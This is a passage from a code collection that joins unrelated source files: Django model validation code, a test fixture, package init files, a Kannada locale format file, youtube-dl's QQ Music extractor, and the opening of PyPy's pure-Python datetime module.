field_label = capfirst(opts.get_field(field_name).verbose_name)
# Insert the error into the error dict, very sneaky
return _(u"%(model_name)s with this %(field_label)s already exists.") % {
'model_name': unicode(model_name),
'field_label': unicode(field_label)
}
# unique_together
else:
field_labels = map(lambda f: capfirst(opts.get_field(f).verbose_name), unique_check)
field_labels = get_text_list(field_labels, _('and'))
return _(u"%(model_name)s with this %(field_label)s already exists.") % {
'model_name': unicode(model_name),
'field_label': unicode(field_labels)
}
def full_clean(self, exclude=None):
"""
Calls clean_fields, clean, and validate_unique, on the model,
and raises a ``ValidationError`` for any errors that occured.
"""
errors = {}
if exclude is None:
exclude = []
try:
self.clean_fields(exclude=exclude)
except ValidationError, e:
errors = e.update_error_dict(errors)
# Form.clean() is run even if other validation fails, so do the
# same with Model.clean() for consistency.
try:
self.clean()
except ValidationError, e:
errors = e.update_error_dict(errors)
# Run unique checks, but only for fields that passed validation.
for name in errors.keys():
if name != NON_FIELD_ERRORS and name not in exclude:
exclude.append(name)
try:
self.validate_unique(exclude=exclude)
except ValidationError, e:
errors = e.update_error_dict(errors)
if errors:
raise ValidationError(errors)
def clean_fields(self, exclude=None):
"""
Cleans all fields and raises a ValidationError containing message_dict
of all validation errors if any occur.
"""
if exclude is None:
exclude = []
errors = {}
for f in self._meta.fields:
if f.name in exclude:
continue
# Skip validation for empty fields with blank=True. The developer
# is responsible for making sure they have a valid value.
raw_value = getattr(self, f.attname)
if f.blank and raw_value in validators.EMPTY_VALUES:
continue
try:
setattr(self, f.attname, f.clean(raw_value, self))
except ValidationError, e:
errors[f.name] = e.messages
if errors:
raise ValidationError(errors)
############################################
# HELPER FUNCTIONS (CURRIED MODEL METHODS) #
############################################
# ORDERING METHODS #########################
def method_set_order(ordered_obj, self, id_list, using=None):
if using is None:
using = DEFAULT_DB_ALIAS
rel_val = getattr(self, ordered_obj._meta.order_with_respect_to.rel.field_name)
order_name = ordered_obj._meta.order_with_respect_to.name
# FIXME: It would be nice if there was an "update many" version of update
# for situations like this.
for i, j in enumerate(id_list):
ordered_obj.objects.filter(**{'pk': j, order_name: rel_val}).update(_order=i)
transaction.commit_unless_managed(using=using)
def method_get_order(ordered_obj, self):
rel_val = getattr(self, ordered_obj._meta.order_with_respect_to.rel.field_name)
order_name = ordered_obj._meta.order_with_respect_to.name
pk_name = ordered_obj._meta.pk.name
return [r[pk_name] for r in
ordered_obj.objects.filter(**{order_name: rel_val}).values(pk_name)]
##############################################
# HELPER FUNCTIONS (CURRIED MODEL FUNCTIONS) #
##############################################
def get_absolute_url(opts, func, self, *args, **kwargs):
return settings.ABSOLUTE_URL_OVERRIDES.get('%s.%s' % (opts.app_label, opts.module_name), func)(self, *args, **kwargs)
########
# MISC #
########
class Empty(object):
pass
def simple_class_factory(model, attrs):
"""Used to unpickle Models without deferred fields.
We need to do this the hard way, rather than just using
the default __reduce__ implementation, because of a
__deepcopy__ problem in Python 2.4
"""
return model
def model_unpickle(model, attrs, factory):
"""
Used to unpickle Model subclasses with deferred fields.
"""
cls = factory(model, attrs)
return cls.__new__(cls)
model_unpickle.__safe_for_unpickle__ = True
if sys.version_info < (2, 5):
# Prior to Python 2.5, Exception was an old-style class
def subclass_exception(name, parents, unused):
return types.ClassType(name, parents, {})
else:
def subclass_exception(name, parents, module):
return type(name, parents, {'__module__': module})
|
pwoodworth/intellij-community | refs/heads/master | python/testData/copyPaste/SelectionOneLine3.dst.py | 83 | class MyClass(object):
member1 = 1
<selection> member2 = 2<caret></selection>
member3 = 3 |
jwilk/mwic | refs/heads/master | lib/__init__.py | 1 | '''
mwic's private modules
'''
type(lambda: (yield from [])) # Python >= 3.3 is required
|
caisq/tensorflow | refs/heads/master | tensorflow/contrib/tfprof/__init__.py | 79 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""tfprof is a tool that profile various aspect of TensorFlow model.
@@model_analyzer
@@tfprof_logger
@@ProfileContext
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import
from tensorflow.contrib.tfprof import model_analyzer
from tensorflow.contrib.tfprof import tfprof_logger
from tensorflow.contrib.tfprof.model_analyzer import ProfileContext
from tensorflow.python.util.all_util import remove_undocumented
_allowed_symbols = ['model_analyzer', 'tfprof_logger', 'ProfileContext']
remove_undocumented(__name__, _allowed_symbols)
|
yask123/django | refs/heads/master | django/conf/locale/kn/formats.py | 619 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y'
TIME_FORMAT = 'h:i A'
# DATETIME_FORMAT =
# YEAR_MONTH_FORMAT =
MONTH_DAY_FORMAT = 'j F'
SHORT_DATE_FORMAT = 'j M Y'
# SHORT_DATETIME_FORMAT =
# FIRST_DAY_OF_WEEK =
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# DATE_INPUT_FORMATS =
# TIME_INPUT_FORMATS =
# DATETIME_INPUT_FORMATS =
# DECIMAL_SEPARATOR =
# THOUSAND_SEPARATOR =
# NUMBER_GROUPING =
|
lycantropos/VKApp | refs/heads/master | vk_app/__init__.py | 2 | from .app import App
|
yasoob/youtube-dl-GUI | refs/heads/master | youtube_dl/extractor/qqmusic.py | 38 | # coding: utf-8
from __future__ import unicode_literals
import random
import re
import time
from .common import InfoExtractor
from ..utils import (
clean_html,
ExtractorError,
strip_jsonp,
unescapeHTML,
)
class QQMusicIE(InfoExtractor):
IE_NAME = 'qqmusic'
IE_DESC = 'QQ音乐'
_VALID_URL = r'https?://y\.qq\.com/n/yqq/song/(?P<id>[0-9A-Za-z]+)\.html'
_TESTS = [{
'url': 'https://y.qq.com/n/yqq/song/004295Et37taLD.html',
'md5': '5f1e6cea39e182857da7ffc5ef5e6bb8',
'info_dict': {
'id': '004295Et37taLD',
'ext': 'mp3',
'title': '可惜没如果',
'release_date': '20141227',
'creator': '林俊杰',
'description': 'md5:d85afb3051952ecc50a1ee8a286d1eac',
'thumbnail': r're:^https?://.*\.jpg$',
}
}, {
'note': 'There is no mp3-320 version of this song.',
'url': 'https://y.qq.com/n/yqq/song/004MsGEo3DdNxV.html',
'md5': 'fa3926f0c585cda0af8fa4f796482e3e',
'info_dict': {
'id': '004MsGEo3DdNxV',
'ext': 'mp3',
'title': '如果',
'release_date': '20050626',
'creator': '李季美',
'description': 'md5:46857d5ed62bc4ba84607a805dccf437',
'thumbnail': r're:^https?://.*\.jpg$',
}
}, {
'note': 'lyrics not in .lrc format',
'url': 'https://y.qq.com/n/yqq/song/001JyApY11tIp6.html',
'info_dict': {
'id': '001JyApY11tIp6',
'ext': 'mp3',
'title': 'Shadows Over Transylvania',
'release_date': '19970225',
'creator': 'Dark Funeral',
'description': 'md5:c9b20210587cbcd6836a1c597bab4525',
'thumbnail': r're:^https?://.*\.jpg$',
},
'params': {
'skip_download': True,
},
}]
_FORMATS = {
'mp3-320': {'prefix': 'M800', 'ext': 'mp3', 'preference': 40, 'abr': 320},
'mp3-128': {'prefix': 'M500', 'ext': 'mp3', 'preference': 30, 'abr': 128},
'm4a': {'prefix': 'C200', 'ext': 'm4a', 'preference': 10}
}
# Reference: m_r_GetRUin() in top_player.js
# http://imgcache.gtimg.cn/music/portal_v3/y/top_player.js
@staticmethod
def m_r_get_ruin():
curMs = int(time.time() * 1000) % 1000
return int(round(random.random() * 2147483647) * curMs % 1E10)
def _real_extract(self, url):
mid = self._match_id(url)
detail_info_page = self._download_webpage(
'http://s.plcloud.music.qq.com/fcgi-bin/fcg_yqq_song_detail_info.fcg?songmid=%s&play=0' % mid,
mid, note='Download song detail info',
errnote='Unable to get song detail info', encoding='gbk')
song_name = self._html_search_regex(
r"songname:\s*'([^']+)'", detail_info_page, 'song name')
publish_time = self._html_search_regex(
r'发行时间:(\d{4}-\d{2}-\d{2})', detail_info_page,
'publish time', default=None)
if publish_time:
publish_time = publish_time.replace('-', '')
singer = self._html_search_regex(
r"singer:\s*'([^']+)", detail_info_page, 'singer', default=None)
lrc_content = self._html_search_regex(
r'<div class="content" id="lrc_content"[^<>]*>([^<>]+)</div>',
detail_info_page, 'LRC lyrics', default=None)
if lrc_content:
lrc_content = lrc_content.replace('\\n', '\n')
thumbnail_url = None
albummid = self._search_regex(
[r'albummid:\'([0-9a-zA-Z]+)\'', r'"albummid":"([0-9a-zA-Z]+)"'],
detail_info_page, 'album mid', default=None)
if albummid:
thumbnail_url = 'http://i.gtimg.cn/music/photo/mid_album_500/%s/%s/%s.jpg' \
% (albummid[-2:-1], albummid[-1], albummid)
guid = self.m_r_get_ruin()
vkey = self._download_json(
'http://base.music.qq.com/fcgi-bin/fcg_musicexpress.fcg?json=3&guid=%s' % guid,
mid, note='Retrieve vkey', errnote='Unable to get vkey',
transform_source=strip_jsonp)['key']
formats = []
for format_id, details in self._FORMATS.items():
formats.append({
'url': 'http://cc.stream.qqmusic.qq.com/%s%s.%s?vkey=%s&guid=%s&fromtag=0'
% (details['prefix'], mid, details['ext'], vkey, guid),
'format': format_id,
'format_id': format_id,
'preference': details['preference'],
'abr': details.get('abr'),
})
self._check_formats(formats, mid)
self._sort_formats(formats)
actual_lrc_lyrics = ''.join(
line + '\n' for line in re.findall(
r'(?m)^(\[[0-9]{2}:[0-9]{2}(?:\.[0-9]{2,})?\][^\n]*|\[[^\]]*\])', lrc_content))
info_dict = {
'id': mid,
'formats': formats,
'title': song_name,
'release_date': publish_time,
'creator': singer,
'description': lrc_content,
'thumbnail': thumbnail_url
}
if actual_lrc_lyrics:
info_dict['subtitles'] = {
'origin': [{
'ext': 'lrc',
'data': actual_lrc_lyrics,
}]
}
return info_dict
class QQPlaylistBaseIE(InfoExtractor):
@staticmethod
def qq_static_url(category, mid):
return 'http://y.qq.com/y/static/%s/%s/%s/%s.html' % (category, mid[-2], mid[-1], mid)
def get_singer_all_songs(self, singmid, num):
return self._download_webpage(
r'https://c.y.qq.com/v8/fcg-bin/fcg_v8_singer_track_cp.fcg', singmid,
query={
'format': 'json',
'inCharset': 'utf8',
'outCharset': 'utf-8',
'platform': 'yqq',
'needNewCode': 0,
'singermid': singmid,
'order': 'listen',
'begin': 0,
'num': num,
'songstatus': 1,
})
def get_entries_from_page(self, singmid):
entries = []
default_num = 1
json_text = self.get_singer_all_songs(singmid, default_num)
json_obj_all_songs = self._parse_json(json_text, singmid)
if json_obj_all_songs['code'] == 0:
total = json_obj_all_songs['data']['total']
json_text = self.get_singer_all_songs(singmid, total)
json_obj_all_songs = self._parse_json(json_text, singmid)
for item in json_obj_all_songs['data']['list']:
if item['musicData'].get('songmid') is not None:
songmid = item['musicData']['songmid']
entries.append(self.url_result(
r'https://y.qq.com/n/yqq/song/%s.html' % songmid, 'QQMusic', songmid))
return entries
class QQMusicSingerIE(QQPlaylistBaseIE):
IE_NAME = 'qqmusic:singer'
IE_DESC = 'QQ音乐 - 歌手'
_VALID_URL = r'https?://y\.qq\.com/n/yqq/singer/(?P<id>[0-9A-Za-z]+)\.html'
_TEST = {
'url': 'https://y.qq.com/n/yqq/singer/001BLpXF2DyJe2.html',
'info_dict': {
'id': '001BLpXF2DyJe2',
'title': '林俊杰',
'description': 'md5:870ec08f7d8547c29c93010899103751',
},
'playlist_mincount': 12,
}
def _real_extract(self, url):
mid = self._match_id(url)
entries = self.get_entries_from_page(mid)
singer_page = self._download_webpage(url, mid, 'Download singer page')
singer_name = self._html_search_regex(
r"singername\s*:\s*'(.*?)'", singer_page, 'singer name', default=None)
singer_desc = None
if mid:
singer_desc_page = self._download_xml(
'http://s.plcloud.music.qq.com/fcgi-bin/fcg_get_singer_desc.fcg', mid,
'Donwload singer description XML',
query={'utf8': 1, 'outCharset': 'utf-8', 'format': 'xml', 'singermid': mid},
headers={'Referer': 'https://y.qq.com/n/yqq/singer/'})
singer_desc = singer_desc_page.find('./data/info/desc').text
return self.playlist_result(entries, mid, singer_name, singer_desc)
class QQMusicAlbumIE(QQPlaylistBaseIE):
IE_NAME = 'qqmusic:album'
IE_DESC = 'QQ音乐 - 专辑'
_VALID_URL = r'https?://y\.qq\.com/n/yqq/album/(?P<id>[0-9A-Za-z]+)\.html'
_TESTS = [{
'url': 'https://y.qq.com/n/yqq/album/000gXCTb2AhRR1.html',
'info_dict': {
'id': '000gXCTb2AhRR1',
'title': '我们都是这样长大的',
'description': 'md5:179c5dce203a5931970d306aa9607ea6',
},
'playlist_count': 4,
}, {
'url': 'https://y.qq.com/n/yqq/album/002Y5a3b3AlCu3.html',
'info_dict': {
'id': '002Y5a3b3AlCu3',
'title': '그리고...',
'description': 'md5:a48823755615508a95080e81b51ba729',
},
'playlist_count': 8,
}]
def _real_extract(self, url):
mid = self._match_id(url)
album = self._download_json(
'http://i.y.qq.com/v8/fcg-bin/fcg_v8_album_info_cp.fcg?albummid=%s&format=json' % mid,
mid, 'Download album page')['data']
entries = [
self.url_result(
'https://y.qq.com/n/yqq/song/' + song['songmid'] + '.html', 'QQMusic', song['songmid']
) for song in album['list']
]
album_name = album.get('name')
album_detail = album.get('desc')
if album_detail is not None:
album_detail = album_detail.strip()
return self.playlist_result(entries, mid, album_name, album_detail)
class QQMusicToplistIE(QQPlaylistBaseIE):
IE_NAME = 'qqmusic:toplist'
IE_DESC = 'QQ音乐 - 排行榜'
_VALID_URL = r'https?://y\.qq\.com/n/yqq/toplist/(?P<id>[0-9]+)\.html'
_TESTS = [{
'url': 'https://y.qq.com/n/yqq/toplist/123.html',
'info_dict': {
'id': '123',
'title': '美国iTunes榜',
'description': 'md5:89db2335fdbb10678dee2d43fe9aba08',
},
'playlist_count': 100,
}, {
'url': 'https://y.qq.com/n/yqq/toplist/3.html',
'info_dict': {
'id': '3',
'title': '巅峰榜·欧美',
'description': 'md5:5a600d42c01696b26b71f8c4d43407da',
},
'playlist_count': 100,
}, {
'url': 'https://y.qq.com/n/yqq/toplist/106.html',
'info_dict': {
'id': '106',
'title': '韩国Mnet榜',
'description': 'md5:cb84b325215e1d21708c615cac82a6e7',
},
'playlist_count': 50,
}]
def _real_extract(self, url):
list_id = self._match_id(url)
toplist_json = self._download_json(
'http://i.y.qq.com/v8/fcg-bin/fcg_v8_toplist_cp.fcg', list_id,
note='Download toplist page',
query={'type': 'toplist', 'topid': list_id, 'format': 'json'})
entries = [self.url_result(
'https://y.qq.com/n/yqq/song/' + song['data']['songmid'] + '.html', 'QQMusic',
song['data']['songmid'])
for song in toplist_json['songlist']]
topinfo = toplist_json.get('topinfo', {})
list_name = topinfo.get('ListName')
list_description = topinfo.get('info')
return self.playlist_result(entries, list_id, list_name, list_description)
class QQMusicPlaylistIE(QQPlaylistBaseIE):
IE_NAME = 'qqmusic:playlist'
IE_DESC = 'QQ音乐 - 歌单'
_VALID_URL = r'https?://y\.qq\.com/n/yqq/playlist/(?P<id>[0-9]+)\.html'
_TESTS = [{
'url': 'http://y.qq.com/n/yqq/playlist/3462654915.html',
'info_dict': {
'id': '3462654915',
'title': '韩国5月新歌精选下旬',
'description': 'md5:d2c9d758a96b9888cf4fe82f603121d4',
},
'playlist_count': 40,
'skip': 'playlist gone',
}, {
'url': 'https://y.qq.com/n/yqq/playlist/1374105607.html',
'info_dict': {
'id': '1374105607',
'title': '易入人心的华语民谣',
'description': '民谣的歌曲易于传唱、、歌词朗朗伤口、旋律简单温馨。属于那种才入耳孔。却上心头的感觉。没有太多的复杂情绪。简单而直接地表达乐者的情绪,就是这样的简单才易入人心。',
},
'playlist_count': 20,
}]
def _real_extract(self, url):
list_id = self._match_id(url)
list_json = self._download_json(
'http://i.y.qq.com/qzone-music/fcg-bin/fcg_ucc_getcdinfo_byids_cp.fcg',
list_id, 'Download list page',
query={'type': 1, 'json': 1, 'utf8': 1, 'onlysong': 0, 'disstid': list_id},
transform_source=strip_jsonp)
if not len(list_json.get('cdlist', [])):
if list_json.get('code'):
raise ExtractorError(
'QQ Music said: error %d in fetching playlist info' % list_json['code'],
expected=True)
raise ExtractorError('Unable to get playlist info')
cdlist = list_json['cdlist'][0]
entries = [self.url_result(
'https://y.qq.com/n/yqq/song/' + song['songmid'] + '.html', 'QQMusic', song['songmid'])
for song in cdlist['songlist']]
list_name = cdlist.get('dissname')
list_description = clean_html(unescapeHTML(cdlist.get('desc')))
return self.playlist_result(entries, list_id, list_name, list_description)
|
pombredanne/grumpy | refs/heads/master | grumpy-runtime-src/third_party/pypy/datetime.py | 6 | """Concrete date/time and related types -- prototype implemented in Python.
See http://www.zope.org/Members/fdrake/DateTimeWiki/FrontPage
See also http://dir.yahoo.com/Reference/calendars/
For a primer on DST, including many current DST rules, see
http://webexhibits.org/daylightsaving/
For more about DST than you ever wanted to know, see
ftp://elsie.nci.nih.gov/pub/
Sources for time zone and DST data: http://www.twinsun.com/tz/tz-link.htm
This was originally copied from the sandbox of the CPython CVS repository.
Thanks to Tim Peters for suggesting using it.
"""
# from __future__ import division
import time as _time
import math as _math
# import struct as _struct
import _struct
def divmod(x, y):
x, y = int(x), int(y)
return x / y, x % y
_SENTINEL = object()
def _cmp(x, y):
return 0 if x == y else 1 if x > y else -1
def _round(x):
return int(_math.floor(x + 0.5) if x >= 0.0 else _math.ceil(x - 0.5))
MINYEAR = 1
MAXYEAR = 9999
_MINYEARFMT = 1900
_MAX_DELTA_DAYS = 999999999
# Utility functions, adapted from Python's Demo/classes/Dates.py, which
# also assumes the current Gregorian calendar indefinitely extended in
# both directions. Difference: Dates.py calls January 1 of year 0 day
# number 1. The code here calls January 1 of year 1 day number 1. This is
# to match the definition of the "proleptic Gregorian" calendar in Dershowitz
# and Reingold's "Calendrical Calculations", where it's the base calendar
# for all computations. See the book for algorithms for converting between
# proleptic Gregorian ordinals and many other calendar systems.
_DAYS_IN_MONTH = [-1, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
_DAYS_BEFORE_MONTH = [-1]
dbm = 0
for dim in _DAYS_IN_MONTH[1:]:
_DAYS_BEFORE_MONTH.append(dbm)
dbm += dim
del dbm, dim
def _is_leap(year):
"year -> 1 if leap year, else 0."
return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
def _days_before_year(year):
"year -> number of days before January 1st of year."
y = year - 1
return y*365 + y//4 - y//100 + y//400
def _days_in_month(year, month):
"year, month -> number of days in that month in that year."
assert 1 <= month <= 12, month
if month == 2 and _is_leap(year):
return 29
return _DAYS_IN_MONTH[month]
def _days_before_month(year, month):
"year, month -> number of days in year preceding first day of month."
assert 1 <= month <= 12, 'month must be in 1..12'
return _DAYS_BEFORE_MONTH[month] + (month > 2 and _is_leap(year))
def _ymd2ord(year, month, day):
"year, month, day -> ordinal, considering 01-Jan-0001 as day 1."
assert 1 <= month <= 12, 'month must be in 1..12'
dim = _days_in_month(year, month)
assert 1 <= day <= dim, ('day must be in 1..%d' % dim)
return (_days_before_year(year) +
_days_before_month(year, month) +
day)
_DI400Y = _days_before_year(401) # number of days in 400 years
_DI100Y = _days_before_year(101) # " " " " 100 "
_DI4Y = _days_before_year(5) # " " " " 4 "
# A 4-year cycle has an extra leap day over what we'd get from pasting
# together 4 single years.
assert _DI4Y == 4 * 365 + 1
# Similarly, a 400-year cycle has an extra leap day over what we'd get from
# pasting together 4 100-year cycles.
assert _DI400Y == 4 * _DI100Y + 1
# OTOH, a 100-year cycle has one fewer leap day than we'd get from
# pasting together 25 4-year cycles.
assert _DI100Y == 25 * _DI4Y - 1
_US_PER_US = 1
_US_PER_MS = 1000
_US_PER_SECOND = 1000000
_US_PER_MINUTE = 60000000
_SECONDS_PER_DAY = 24 * 3600
_US_PER_HOUR = 3600000000
_US_PER_DAY = 86400000000
_US_PER_WEEK = 604800000000
def _ord2ymd(n):
"ordinal -> (year, month, day), considering 01-Jan-0001 as day 1."
# n is a 1-based index, starting at 1-Jan-1. The pattern of leap years
# repeats exactly every 400 years. The basic strategy is to find the
# closest 400-year boundary at or before n, then work with the offset
# from that boundary to n. Life is much clearer if we subtract 1 from
# n first -- then the values of n at 400-year boundaries are exactly
# those divisible by _DI400Y:
#
# D M Y n n-1
# -- --- ---- ---------- ----------------
# 31 Dec -400 -_DI400Y -_DI400Y -1
# 1 Jan -399 -_DI400Y +1 -_DI400Y 400-year boundary
# ...
# 30 Dec 000 -1 -2
# 31 Dec 000 0 -1
# 1 Jan 001 1 0 400-year boundary
# 2 Jan 001 2 1
# 3 Jan 001 3 2
# ...
# 31 Dec 400 _DI400Y _DI400Y -1
# 1 Jan 401 _DI400Y +1 _DI400Y 400-year boundary
n -= 1
n400, n = divmod(n, _DI400Y)
year = n400 * 400 + 1 # ..., -399, 1, 401, ...
# Now n is the (non-negative) offset, in days, from January 1 of year, to
# the desired date. Now compute how many 100-year cycles precede n.
# Note that it's possible for n100 to equal 4! In that case 4 full
# 100-year cycles precede the desired day, which implies the desired
# day is December 31 at the end of a 400-year cycle.
n100, n = divmod(n, _DI100Y)
# Now compute how many 4-year cycles precede it.
n4, n = divmod(n, _DI4Y)
# And now how many single years. Again n1 can be 4, and again meaning
# that the desired day is December 31 at the end of the 4-year cycle.
n1, n = divmod(n, 365)
year += n100 * 100 + n4 * 4 + n1
if n1 == 4 or n100 == 4:
assert n == 0
return year-1, 12, 31
# Now the year is correct, and n is the offset from January 1. We find
# the month via an estimate that's either exact or one too large.
leapyear = n1 == 3 and (n4 != 24 or n100 == 3)
assert leapyear == _is_leap(year)
month = (n + 50) >> 5
preceding = _DAYS_BEFORE_MONTH[month] + (month > 2 and leapyear)
if preceding > n: # estimate is too large
month -= 1
preceding -= _DAYS_IN_MONTH[month] + (month == 2 and leapyear)
n -= preceding
assert 0 <= n < _days_in_month(year, month)
# Now the year and month are correct, and n is the offset from the
# start of that month: we're done!
return year, month, n+1
# Month and day names. For localized versions, see the calendar module.
_MONTHNAMES = [None, "Jan", "Feb", "Mar", "Apr", "May", "Jun",
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
_DAYNAMES = [None, "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
def _build_struct_time(y, m, d, hh, mm, ss, dstflag):
wday = (_ymd2ord(y, m, d) + 6) % 7
dnum = _days_before_month(y, m) + d
return _time.struct_time((y, m, d, hh, mm, ss, wday, dnum, dstflag))
def _format_time(hh, mm, ss, us):
# Skip trailing microseconds when us==0.
result = "%02d:%02d:%02d" % (hh, mm, ss)
if us:
result += ".%06d" % us
return result
# Correctly substitute for %z and %Z escapes in strftime formats.
# def _wrap_strftime(object, format, timetuple):
# year = timetuple[0]
# if year < _MINYEARFMT:
# raise ValueError("year=%d is before %d; the datetime strftime() "
# "methods require year >= %d" %
# (year, _MINYEARFMT, _MINYEARFMT))
# # Don't call utcoffset() or tzname() unless actually needed.
# freplace = None # the string to use for %f
# zreplace = None # the string to use for %z
# Zreplace = None # the string to use for %Z
# # Scan format for %z and %Z escapes, replacing as needed.
# newformat = []
# push = newformat.append
# i, n = 0, len(format)
# while i < n:
# ch = format[i]
# i += 1
# if ch == '%':
# if i < n:
# ch = format[i]
# i += 1
# if ch == 'f':
# if freplace is None:
# freplace = '%06d' % getattr(object,
# 'microsecond', 0)
# newformat.append(freplace)
# elif ch == 'z':
# if zreplace is None:
# zreplace = ""
# if hasattr(object, "_utcoffset"):
# offset = object._utcoffset()
# if offset is not None:
# sign = '+'
# if offset < 0:
# offset = -offset
# sign = '-'
# h, m = divmod(offset, 60)
# zreplace = '%c%02d%02d' % (sign, h, m)
# assert '%' not in zreplace
# newformat.append(zreplace)
# elif ch == 'Z':
# if Zreplace is None:
# Zreplace = ""
# if hasattr(object, "tzname"):
# s = object.tzname()
# if s is not None:
# # strftime is going to have at this: escape %
# Zreplace = s.replace('%', '%%')
# newformat.append(Zreplace)
# else:
# push('%')
# push(ch)
# else:
# push('%')
# else:
# push(ch)
# newformat = "".join(newformat)
# return _time.strftime(newformat, timetuple)
# Just raise TypeError if the arg isn't None or a string.
def _check_tzname(name):
if name is not None and not isinstance(name, str):
raise TypeError("tzinfo.tzname() must return None or string, "
"not '%s'" % type(name))
# name is the offset-producing method, "utcoffset" or "dst".
# offset is what it returned.
# If offset isn't None or timedelta, raises TypeError.
# If offset is None, returns None.
# Else offset is checked for being in range, and a whole # of minutes.
# If it is, its integer value is returned. Else ValueError is raised.
def _check_utc_offset(name, offset):
assert name in ("utcoffset", "dst")
if offset is None:
return
if not isinstance(offset, timedelta):
raise TypeError("tzinfo.%s() must return None "
"or timedelta, not '%s'" % (name, type(offset)))
days = offset.days
if days < -1 or days > 0:
offset = 1440 # trigger out-of-range
else:
seconds = days * 86400 + offset.seconds
minutes, seconds = divmod(seconds, 60)
if seconds or offset.microseconds:
raise ValueError("tzinfo.%s() must return a whole number "
"of minutes" % name)
offset = minutes
if not -1440 < offset < 1440:
raise ValueError("%s()=%d, must be in -1439..1439" % (name, offset))
return offset
def _check_int_field(value):
if isinstance(value, int):
return int(value)
if not isinstance(value, float):
try:
value = value.__int__()
except AttributeError:
pass
else:
if isinstance(value, int):
return int(value)
elif isinstance(value, long):
return int(long(value))
raise TypeError('__int__ method should return an integer')
raise TypeError('an integer is required')
raise TypeError('integer argument expected, got float')
def _check_date_fields(year, month, day):
year = _check_int_field(year)
month = _check_int_field(month)
day = _check_int_field(day)
if not MINYEAR <= year <= MAXYEAR:
raise ValueError('year must be in %d..%d' % (MINYEAR, MAXYEAR), year)
if not 1 <= month <= 12:
raise ValueError('month must be in 1..12', month)
dim = _days_in_month(year, month)
if not 1 <= day <= dim:
raise ValueError('day must be in 1..%d' % dim, day)
return year, month, day
def _check_time_fields(hour, minute, second, microsecond):
hour = _check_int_field(hour)
minute = _check_int_field(minute)
second = _check_int_field(second)
microsecond = _check_int_field(microsecond)
if not 0 <= hour <= 23:
raise ValueError('hour must be in 0..23', hour)
if not 0 <= minute <= 59:
raise ValueError('minute must be in 0..59', minute)
if not 0 <= second <= 59:
raise ValueError('second must be in 0..59', second)
if not 0 <= microsecond <= 999999:
raise ValueError('microsecond must be in 0..999999', microsecond)
return hour, minute, second, microsecond
def _check_tzinfo_arg(tz):
if tz is not None and not isinstance(tz, tzinfo):
raise TypeError("tzinfo argument must be None or of a tzinfo subclass")
# Notes on comparison: In general, datetime module comparison operators raise
# TypeError when they don't know how to do a comparison themself. If they
# returned NotImplemented instead, comparison could (silently) fall back to
# the default compare-objects-by-comparing-their-memory-addresses strategy,
# and that's not helpful. There are two exceptions:
#
# 1. For date and datetime, if the other object has a "timetuple" attr,
# NotImplemented is returned. This is a hook to allow other kinds of
# datetime-like objects a chance to intercept the comparison.
#
# 2. Else __eq__ and __ne__ return False and True, respectively. This is
# so opertaions like
#
# x == y
# x != y
# x in sequence
# x not in sequence
# dict[x] = y
#
# don't raise annoying TypeErrors just because a datetime object
# is part of a heterogeneous collection. If there's no known way to
# compare X to a datetime, saying they're not equal is reasonable.
def _cmperror(x, y):
raise TypeError("can't compare '%s' to '%s'" % (
type(x).__name__, type(y).__name__))
def _normalize_pair(hi, lo, factor):
if not 0 <= lo <= factor-1:
inc, lo = divmod(lo, factor)
hi += inc
return hi, lo
def _normalize_datetime(y, m, d, hh, mm, ss, us, ignore_overflow=False):
# Normalize all the inputs, and store the normalized values.
ss, us = _normalize_pair(ss, us, 1000000)
mm, ss = _normalize_pair(mm, ss, 60)
hh, mm = _normalize_pair(hh, mm, 60)
d, hh = _normalize_pair(d, hh, 24)
y, m, d = _normalize_date(y, m, d, ignore_overflow)
return y, m, d, hh, mm, ss, us
def _normalize_date(year, month, day, ignore_overflow=False):
# That was easy. Now it gets muddy: the proper range for day
# can't be determined without knowing the correct month and year,
# but if day is, e.g., plus or minus a million, the current month
# and year values make no sense (and may also be out of bounds
# themselves).
# Saying 12 months == 1 year should be non-controversial.
if not 1 <= month <= 12:
year, month = _normalize_pair(year, month-1, 12)
month += 1
assert 1 <= month <= 12
# Now only day can be out of bounds (year may also be out of bounds
# for a datetime object, but we don't care about that here).
# If day is out of bounds, what to do is arguable, but at least the
# method here is principled and explainable.
dim = _days_in_month(year, month)
if not 1 <= day <= dim:
# Move day-1 days from the first of the month. First try to
# get off cheap if we're only one day out of range (adjustments
# for timezone alone can't be worse than that).
if day == 0: # move back a day
month -= 1
if month > 0:
day = _days_in_month(year, month)
else:
year, month, day = year-1, 12, 31
elif day == dim + 1: # move forward a day
month += 1
day = 1
if month > 12:
month = 1
year += 1
else:
ordinal = _ymd2ord(year, month, 1) + (day - 1)
year, month, day = _ord2ymd(ordinal)
if not ignore_overflow and not MINYEAR <= year <= MAXYEAR:
raise OverflowError("date value out of range")
return year, month, day
def _accum(tag, sofar, num, factor, leftover):
if isinstance(num, (int, long)):
prod = num * factor
rsum = sofar + prod
return rsum, leftover
if isinstance(num, float):
fracpart, intpart = _math.modf(num)
prod = int(intpart) * factor
rsum = sofar + prod
if fracpart == 0.0:
return rsum, leftover
assert isinstance(factor, (int, long))
fracpart, intpart = _math.modf(factor * fracpart)
rsum += int(intpart)
return rsum, leftover + fracpart
raise TypeError("unsupported type for timedelta %s component: %s" %
(tag, type(num)))
class timedelta(object):
"""Represent the difference between two datetime objects.
Supported operators:
- add, subtract timedelta
- unary plus, minus, abs
- compare to timedelta
- multiply, divide by int/long
In addition, datetime supports subtraction of two datetime objects
